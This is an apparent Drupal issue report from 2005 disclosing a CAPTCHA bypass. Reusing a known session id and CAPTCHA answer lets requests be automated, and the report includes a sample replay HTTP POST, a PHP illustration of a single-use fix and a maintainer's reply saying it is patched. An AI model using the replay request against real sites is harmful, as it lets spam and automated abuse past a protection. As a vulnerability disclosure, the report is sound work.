Most CAPTCHAs don't destroy the session when the correct phrase is entered. So by reusing the session id of a known CAPTCHA image, it is possible to automate requests to a CAPTCHA-protected page.
I have tested a number of free and commercial CAPTCHA scripts, and most of them are vulnerable to this method of exploitation. This includes the popular humanVerify solution, and many others.
Manual steps:
connect to the CAPTCHA page
record the session ID and CAPTCHA plaintext
Automated steps:
resend the session ID and CAPTCHA plaintext any number of times, changing the user data, e.g.:
POST /vuln_script.php HTTP/1.0
Cookie: PHPSESSID=329847239847238947;
^^^ this is the session id of the page you looked at manually
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Connection: close

name=bob&email=bob@fish.com&captcha=the_plaintext
^^^ this includes the captcha string for the page you looked at manually
The Drupal Captcha is vulnerable
tested on July 7th, 2005
------------------------------------------
Reference: http://www.puremango.co.uk/cm_breaking_captcha_115.php
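The fix the report calls for, as an added illustration that is not code from this page or from the Drupal captcha module: a session-based check in the replayable form beside a single-use form that consumes the stored answer on the first verification attempt, so resending the same PHPSESSID and plaintext is rejected. The function names and the `captcha_answer` session key are assumptions; a plain array stands in for `$_SESSION`.

```php
<?php
// Added example, not the page's own code. Session key and function names are assumed.
// A plain array is passed by reference to stand in for $_SESSION after session_start().

// Replayable pattern: the expected answer stays in the session after a
// successful check, so the same session id and plaintext can be resent at will.
function verify_captcha_replayable(array &$session, string $answer): bool
{
    if (!isset($session['captcha_answer'])) {
        return false;
    }
    return $session['captcha_answer'] === $answer;
}

// Single-use pattern: the stored answer is removed on the first attempt,
// right or wrong, so every further submission needs a freshly issued image.
function verify_captcha_single_use(array &$session, string $answer): bool
{
    if (!isset($session['captcha_answer'])) {
        return false;
    }
    $expected = $session['captcha_answer'];
    unset($session['captcha_answer']);       // consume before comparing
    return hash_equals($expected, $answer);  // constant-time string compare
}

// One browser session, two submissions with the same session and plaintext.
$session = ['captcha_answer' => 'the_plaintext'];
var_dump(verify_captcha_replayable($session, 'the_plaintext'));  // first submission
var_dump(verify_captcha_replayable($session, 'the_plaintext'));  // replay of the same data

$session = ['captcha_answer' => 'the_plaintext'];
var_dump(verify_captcha_single_use($session, 'the_plaintext'));  // first submission
var_dump(verify_captcha_single_use($session, 'the_plaintext'));  // replay of the same data
```

In the single-use form the second call fails because the answer is gone from the session, which is the behaviour the reported scripts lack.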
Comments
Comment #1
arnabdotorg commented:
Thanks for the heads up; patched and fixed for CVS, 4.6 and 4.5
-Arnab